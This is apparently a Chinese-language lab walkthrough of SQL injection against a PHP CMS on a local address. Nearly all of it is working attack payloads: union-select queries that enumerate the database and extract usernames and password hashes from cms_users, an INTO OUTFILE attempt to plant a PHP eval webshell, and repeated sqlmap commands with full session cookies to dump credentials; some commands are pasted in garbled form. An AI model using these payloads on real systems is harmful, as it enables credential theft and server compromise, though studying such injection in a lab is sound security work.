目录
判断注入类型:
排除是字符型注入。
确认注入类型是数值(数字)型。
判断所在数据库表的列数:
http://192.168.1.99:8085/show.php?id=32 order by 15
当order by 16的时候出现报错:
说明当前表有15列。
判断表列的回显位置:
http://192.168.1.99:8085/show.php
?id=32 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
没有回显出来,前面改成一个不存在的id即可:
http://192.168.1.99:8085/show.php
?id=-32 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,1
回显位是3和11
获取当前数据库及表信息:
http://192.168.1.99:8085/show.php
?id=-32 union select 1,2,database(),4,5,6,7,8,9,10,version(),12,13,14,15
http://192.168.1.99:8085/show.php?id=-32 union select 1,2,group_concat(table_name) ,4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.tables where table_schema=database()
http://192.168.1.99:8085/show.php?id=-32 union select 1,2,unhex(hex(group_concat(table_name))) ,4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.tables where table_schema=database()
http://192.168.1.99:8085/show.php?id=-32 union select 1,2,unhex(hex(group_concat(column_name))) ,4,5,6,7,8,9,10,version(),12,13,14,15 from information_schema.columns where table_name='cms_users'
http://192.168.1.99:8085/show.php?id=-32 union select 1,2,username,4,5,6,7,8,9,10,password,12,13,14,15 from cms_users
或者:
http://192.168.1.99:8085/show.php?id=-32 union select 1,2, group_concat(userid,':',username,':',password),4,5,6,7,8,9,10,database(),12,13,14,15 from cms_users
此时拿到用户ID,用户名和密码的MD5,对应密码是123456
收集后台系统信息:
http://192.168.1.99:8085/show.php?id=-32 union select 1,2, @@version_compile_os,4,5,6,7,8,9,10,database(),12,13,14,15
进入后台:
在“文件管理”测试发现绝对路径在报错后一闪而过,随抓包到绝对路径:
X:\phpstudy_pro\WWW\cms\admin\
构造SQL语句构造shell:
http://192.168.1.99:8085/show.php?id=-32 union select 1,2, "<?php @eval($_POST['c'])?>",4,5,6,7,8,9,10,database(),12,13,14,15 into outfile "X:\phpstudy_pro\WWW\cms\cmsSHELL.php"
这里由于在建站的时候强制使用的cms普通用户,没有权限写入webshell。
SQLMAP注入演示:
抓包拿到Cookie:
召唤sqlmap:
sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D"
sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0└─# sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhF└─# sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --dbs
sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --tables -D "cms"
sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --columns -D "cms" -T "cms_users"
sqlmap -u "http://192.168.1.99:8085/show.php?id=34" --cookie "pma_lang=zh_CN; kbqug_admin_username=2621-PL_LxhFjyVe43ZuQvht6MI5q0ZcpRVV5FI0pzQ6XR8; kbqug_siteid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_userid=2621-PL_LxhFjyVe4yA5Gqw55s8wqkcL8ERR5wR1; kbqug_admin_email=2621-PL_LxhFjyVe4yM-T_trssA4_kdbrUJW4gMupiUpVQLPFgNuKrYAr0r-CmXajEo6; kbqug_sys_lang=2621-PL_LxhFjyVe4yRsT_xsscAxrUdZ8EdTtlU-p2k6Xg; kbqug_auth=8f25hAZjHIcOOCVHkg7Oi_spqG-hrNi4M0KDB7yq8W0zpshONXAN9tff4QF2ewZRqgscV1xovJ5cQSn9Cqah7HYamsOo6Fo62ucIvWc0P7RbH09tScvTvJY-yxHkVnQq9eCVNOEAZvCDGw6aKtXXsus; kbqug__userid=8f25hAZjHIcOOCVHkgnKj617p2eo_da5MhfWUrqj; kbqug__username=8f25hAZjHIcOOCVHkg-fi6hzqWih-IXpN0LWUL3j4Dp0; kbqug__groupid=8f25hAZjHIcOOCVHkgjNjf159T6goNO_YxbXULmg; kbqug__nickname=8f25hAZjHIcOOCVHkljKi_lyojmo-NPobkbXAej69jxts8s; pmaUser-1=%7B%22iv%22%3A%22P8ra%2BbNbaLKMN100VdkzOg%3D%3D%22%2C%22mac%22%3A%2204901c879eecad49871ea934a852b16a45f9cf99%22%2C%22payload%22%3A%22qh00OcxMqJxc2p7H5ErIcQ%3D%3D%22%7D" --dump -D "cms" -T "cms_users" -C "userid,username,password"
